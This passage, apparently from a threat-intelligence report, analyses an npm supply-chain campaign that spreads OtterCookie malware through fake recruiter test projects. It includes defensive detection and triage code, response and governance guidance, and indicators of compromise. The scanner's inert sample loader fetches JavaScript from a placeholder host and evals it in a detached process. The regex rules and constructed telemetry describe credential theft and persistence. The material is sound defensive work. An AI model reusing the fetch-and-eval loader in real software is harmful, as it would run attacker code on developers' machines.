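    if (!byHost.has(e.host)) byHost.set(e.host, []);
    byHost.get(e.host).push({ ...e, t: Date.parse(e.ts), classes: classify(e) });
  }
  const alerts = [];
  for (const [host, list] of byHost) {
    list.sort((a, b) => a.t - b.t);
    for (const anchor of list.filter(e => e.classes.includes('npm_install'))) {
      const seen = new Set();
      for (const e of list) {
        if (e.t >= anchor.t && e.t - anchor.t <= WINDOW_MS) {
          e.classes.forEach(c => { if (c !== 'npm_install') seen.add(c); });
        }
      }
      if (seen.size === 0) continue;
      const severity = seen.has('c2_contact') ? 'critical' : seen.size >= 2 ? 'high' : 'medium';
      alerts.push({ host, install: anchor.cmd, at: anchor.ts, severity, classes: [...seen].sort() });
    }
  }
  return alerts;
}

// Constructed telemetry, not real logs: one developer laptop that matches the
// described chain, and one CI runner doing a normal install.
const SAMPLE_EVENTS = [
  { ts: '2025-11-26T10:00:00Z', host: 'dev-laptop-01', type: 'process', image: 'node', parent: 'bash', cmd: 'npm install tailwind-magic' },
  { ts: '2025-11-26T10:00:04Z', host: 'dev-laptop-01', type: 'network', process: 'node', dest: 'registry.npmjs.org', port: 443 },
  { ts: '2025-11-26T10:00:06Z', host: 'dev-laptop-01', type: 'network', process: 'node', dest: 'tetrismic.vercel.app', port: 443 },
  { ts: '2025-11-26T10:00:09Z', host: 'dev-laptop-01', type: 'network', process: 'node', dest: '144.172.104.117', port: 5918 },
  { ts: '2025-11-26T10:00:12Z', host: 'dev-laptop-01', type: 'process', image: 'node', parent: 'node', cmd: 'node index.js', detached: true },
  { ts: '2025-11-26T10:00:20Z', host: 'dev-laptop-01', type: 'registry', process: 'reg.exe',
    key: 'HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run', valueName: 'NodeHelper',
    value: 'node C:\\Users\\dev\\AppData\\Roaming\\NodeHelper\\index.js' },
  { ts: '2025-11-26T10:01:30Z', host: 'dev-laptop-01', type: 'file', op: 'read', process: 'node',
    path: 'C:\\Users\\dev\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data' },
  { ts: '2025-11-26T11:00:00Z', host: 'build-runner-02', type: 'process', image: 'node', parent: 'sh', cmd: 'npm install --frozen-lockfile' },
  { ts: '2025-11-26T11:00:03Z', host: 'build-runner-02', type: 'network', process: 'node', dest: 'registry.npmjs.org', port: 443 },
];

console.log(JSON.stringify(correlate(SAMPLE_EVENTS), null, 2));
```

In production the classifiers would be fed from EDR process, registry and file telemetry plus proxy or DNS logs, and the `npm_install` anchor extended to `yarn`, `pnpm` and CI runner installs. The indicator set is the part that goes stale first; the behaviour classes (persistence written by a node process, browser credential stores read by node, detached node children) are what still fire after the staging domain and C2 address have been rotated, which is why severity is driven by class count rather than by indicator matches alone.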


Response

Response requires collecting endpoint logs showing Node.js execution chains, npm install histories, registry Run key modifications, scheduled task creation, browser credential DB access, outbound C2 communication, and filesystem traversal artifacts. Expected artifacts include loader scripts, the staged main.js payload retrieved from tetrismic[.]vercel[.]app, OtterCookie modules (clipboard, credential, screenshot, keylogging components), persistence entries, and exfiltration logs. Anti-forensic behavior is limited mainly to VM/sandbox avoidance, but the malware’s multi-process detachment complicates containment. Reconstruction relies on correlating npm install timestamps with outbound requests to staging domains and on the creation of persistence mechanisms, then mapping clipboard, credential, and file exfiltration events to specific DFIR impact estimates for FAIR modeling. Likely containment involves quarantining infected developer endpoints, blocking associated domains/IPs, rotating all potentially exposed credentials and signing keys, and validating that production secrets were not accessible. Priority artifacts include the malicious npm packages, network captures of eval-based payload retrieval, credential theft logs, and screenshots exfiltrated to the C2 server. Telemetry requirements center on high-fidelity endpoint and network data; IR gaps typically include a lack of historic npm telemetry and weak visibility into developer workflows. DFIR validation requires executing safe replicas of malicious loaders in isolated sandboxes to confirm behavior matches observed indicators.


Reverse Engineering

Reverse engineering should focus on the loader behavior embedded in malicious npm packages that execute import-time code, fetch remote JavaScript from tetrismic[.]vercel[.]app, and run it inside the Node.js process via eval. Evasion mechanisms include multi-platform VM and sandbox checks, anti-analysis fingerprinting, and the separation of infrastructure across GitHub, Vercel, and a dedicated C2 server. Persistence artifacts include registry Run keys and scheduled tasks on Windows. Indicators include hardcoded references to the staging domain, eval-based execution, specific wallet extension IDs, repeated clipboard and filesystem API calls, and outbound HTTP POST patterns. Dynamic hooks should instrument Node.js child_process, fs, and clipboard APIs, as well as axios/fetch calls to capture the payload execution flow; static analysis should review obfuscated or hex-encoded modules and the staged main.js. Expected artifacts include screenshots, keylogging buffers, harvested browser credential exports, and copied wallet extension directories. Additional reverse engineering efforts should compare OtterCookie’s modules to earlier BeaverTail/OtterCookie variants to identify version changes, capability evolution, and infrastructure reuse.
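An added example, not code from the Socket report or Socket's own tooling, of the static triage the paragraph above describes (and of the pre-install package verification the governance section later mandates): it decodes hex-escaped string literals, then flags the fetch-to-eval loader shape, Vercel-hosted staging hosts, hardcoded IP URLs and detached child processes. Rule names, weights, verdict thresholds and both sample packages are constructed; the malicious sample uses a placeholder host and is only scanned, never executed.

```javascript
// Added example: static triage of a package manifest and sources for the
// loader primitives described above. Rules, weights and samples are assumptions.
const FETCH_RE    = /\b(axios\.(get|post|request)|fetch|https?\.(get|request))\s*\(/;
const EVAL_RE     = /\b(eval|new\s+Function|vm\.runIn(This|New)Context)\s*\(/;
const VERCEL_RE   = /[a-z0-9.-]*vercel\.app\b/i;
const IPV4_URL_RE = /https?:\/\/\d{1,3}(\.\d{1,3}){3}(:\d+)?/;
const DETACHED_RE = /detached\s*:\s*true/;
const HEX_ESC_RE  = /\\x([0-9a-fA-F]{2})/g;

// Decode \xHH escapes so indicators hidden in hex-encoded string literals
// become visible to the plain-text rules.
function decodeHexEscapes(src) {
  return src.replace(HEX_ESC_RE, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Scan one source file; returns findings with a weight each.
function scanSource(name, raw) {
  const f = [];
  const escapes = (raw.match(HEX_ESC_RE) || []).length;
  const code = decodeHexEscapes(raw);
  const fetches = FETCH_RE.test(code), evals = EVAL_RE.test(code);
  if (escapes >= 8) f.push({ rule: "hex_obfuscation", weight: 2, detail: `${name}: ${escapes} \\x escapes` });
  if (fetches) f.push({ rule: "remote_fetch", weight: 1, detail: name });
  if (evals) f.push({ rule: "dynamic_eval", weight: 2, detail: name });
  if (fetches && evals) f.push({ rule: "remote_eval_chain", weight: 6, detail: name });
  const host = code.match(VERCEL_RE);
  if (host) f.push({ rule: "staging_host", weight: 4, detail: `${name}: ${host[0]}` });
  const ip = code.match(IPV4_URL_RE);
  if (ip) f.push({ rule: "hardcoded_ip_url", weight: 4, detail: `${name}: ${ip[0]}` });
  if (DETACHED_RE.test(code)) f.push({ rule: "detached_spawn", weight: 3, detail: name });
  return f;
}

// Lifecycle scripts run at install time; an import-time loader needs none,
// which is why the source scan matters even when the manifest looks clean.
function analyzePackage({ manifest, files }) {
  const findings = [];
  const scripts = (manifest && manifest.scripts) || {};
  for (const k of ["preinstall", "install", "postinstall"]) {
    if (scripts[k]) findings.push({ rule: "lifecycle_script", weight: 2, detail: `${k}: ${scripts[k]}` });
  }
  for (const [name, raw] of Object.entries(files)) findings.push(...scanSource(name, raw));
  const score = findings.reduce((s, x) => s + x.weight, 0);
  return { findings, score, verdict: verdict(findings, score) };
}

// A fetch-to-eval chain blocks on its own; everything else accumulates.
function verdict(findings, score) {
  if (findings.some(x => x.rule === "remote_eval_chain") || score >= 8) return "block";
  return score >= 3 ? "review" : "allow";
}

// Constructed, inert sample in the loader shape described above; the host is a
// placeholder, partly hex-escaped. It is scanned as text, never executed.
const SAMPLE_MALICIOUS = {
  manifest: { name: "example-ui-helper", version: "1.0.3" },
  files: { "index.js": [
    'const axios = require("axios");',
    'const { spawn } = require("child_process");',
    'const host = "stage-example." + "\\x76\\x65\\x72\\x63\\x65\\x6c\\x2e\\x61\\x70\\x70";',
    '(async () => {',
    '  const r = await axios.get("https://" + host + "/main.js");',
    '  eval(r.data);',
    '  spawn(process.execPath, ["-e", r.data], { detached: true, stdio: "ignore" }).unref();',
    '})();' ].join("\n") },
};
const SAMPLE_BENIGN = {
  manifest: { name: "example-config-reader", version: "2.0.0" },
  files: { "index.js": 'const fs = require("fs");\nmodule.exports = p => JSON.parse(fs.readFileSync(p, "utf8"));' },
};

console.log(analyzePackage(SAMPLE_MALICIOUS).verdict, analyzePackage(SAMPLE_BENIGN).verdict);
```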


CTI

CTI analysis should evaluate PIRs around whether the actor targets the organization’s sector (blockchain/Web3), whether any developers fit the recruitment-lure profile, the recurrence of npm infiltration waves (weekly additions of new malicious packages), and consistent TTPs such as typosquatted npm loaders, Vercel-hosted remote payloads, eval-based execution, browser credential theft, and recursive file harvesting. Assets most consistently targeted include developer endpoints, browser stores, wallet extensions, and repositories used for test assignments. SIR evaluation highlights missing IOCs such as hashes for specific malicious npm versions, complete lists of C2 endpoints, and detailed relationships among cloned GitHub repositories; additional malware samples and payload versions are needed to confirm capability drift. Attribution gaps center on infrastructure clustering and reuse patterns, necessitating more comprehensive mapping of GitHub, Vercel, and C2 nodes. Telemetry requirements include npm install logs, GitHub clone events, Node.js process activity, and outbound HTTP patterns toward suspicious domains. Collection priorities include continuous monitoring of OSINT sources, supply-chain security vendors, malware sandboxes analyzing Node.js threats, ISAC notifications, and tracking new npm package uploads by suspicious accounts. Mapping efforts should cluster infrastructure across stardev0914-type accounts, identify recurring loader patterns, map TTPs to ATT&CK to support trend identification, compare new packages to historical OtterCookie deployments, and assess confidence levels as new data emerge. Overall, CTI should focus on detecting emerging patterns in loader design, frequency of npm infiltrations, payload evolution, and infrastructure rotation to refine hypotheses and improve forecasting.


GRC and Testing

Governance

Governance updates should prioritize strengthening policy requirements for software supply-chain security, explicitly mandating pre-install verification of npm dependencies, behavioral package analysis, and restrictions on executing dynamically fetched JavaScript, requirements that are often missing or insufficient in existing policies. Oversight functions should include formal review of developer workflows, CI/CD dependency integration, and cloud-to-endpoint trust boundaries to ensure recruiters’ “test assignments” or cloned GitHub repositories cannot bypass established governance. RA, PM, and PL family documents require updates to reflect the organization’s exposure to third-party code execution, mandating architectural controls for supply-chain intake, multi-environment separation, and defined telemetry baselines for developer workstations. The risk register should add a dedicated supply-chain compromise entry, detailing impacts such as credential theft, seed phrase exposure, and downstream production compromise, along with FAIR-derived frequency and magnitude estimates. Executives and the board should receive recurring briefings summarizing attacker TTP evolution, the cadence of npm infiltration, exposure conditions for internal developer teams, and the potential business impact—framed in clear financial terms and tied directly to governance decisions on investment in secure development lifecycle controls and monitoring capabilities.


Audit and Offensive Security Testing

Audit and offensive security activities should validate whether current controls meaningfully prevent or detect malicious npm packages, assess evidence gaps in dependency onboarding, and verify whether policies governing developer environments, CI runners, and repository intake are consistently enforced. Findings should focus on weaknesses such as missing logging for Node.js execution, inadequate egress filtering, insufficient code-review rigor, and lack of supply-chain integrity checks. Compliance requirements tied to software integrity, boundary protection, and malicious code detection must be evaluated against actual behaviors exhibited by OtterCookie, including remote eval, credential theft, and filesystem scraping. Red team exercises should simulate developer-workflow compromise by introducing test malicious packages or lure repositories to measure detection and response effectiveness, while purple teams refine analytics for eval-based payload delivery or multi-process detachment. The penetration testing scope should explicitly include dependency trees, GitHub template ingestion, and ephemeral CI/CD environments to reproduce how an attacker’s loader executes and propagates. Control validation should verify that updated governance requirements—such as dependency pinning, package reputation checks, and egress restrictions—operate effectively against realistic exploit reproductions mirroring this campaign’s methods.


Awareness Training

Awareness training must highlight the social engineering pattern central to this operation: recruiter personas assigning “test projects” that direct developers to clone malicious GitHub repositories or install deceptive npm packages. Human failure modes—such as trusting unsolicited recruiters, importing dependencies without inspection, and executing commands from unfamiliar code—should be explicitly addressed with scenario-driven examples. Role-specific adjustments are needed: developers must receive in-depth training on supply-chain risks and dependency vetting; administrators should understand the impacts of credential harvesting and the importance of endpoint hardening; finance and executives should recognize that seed-phrase theft and wallet compromise can result in direct financial losses. Employees should be taught to recognize behavioral indicators such as typosquatted package names, unexpected post-install behavior, or recruiter-provided repositories that require npm installs. Phishing simulations should include developer-centric lures (GitHub project invites, coding assignments, npm instructions). Communication guidelines should reinforce cautious handling of unsolicited job-related outreach and strict verification of external repositories. Reinforcement cycles should measure reductions in susceptibility by tracking changes in developer behavior, dependency-review compliance, and improved reporting of suspicious packages or recruiter interactions.


Indicators of Compromise

Malicious npm Packages Linked to Tetrismic C2

tailwind-magic

tailwind-node

node-tailwind

node-tailwind-magic

react-modal-select


GitHub Account

github[.]com/stardev0914


stardev0914 GitHub Repositories

tetrismic

tailwind-magic

dexproject

etherchainai

snortertoken

protocolai

pepeheimer

futuresyncx

captainpepe

safutoken

laifubnb

spurdomeme

aptober

bestwallet


C2 Infrastructure

tetrismic[.]vercel[.]app

knightsbridge-dex[.]vercel[.]app

144[.]172[.]104[.]117

144[.]172[.]104[.]117:5918


Malicious npm Packages Since October 10, 2025


npm Aliases


Email Addresses

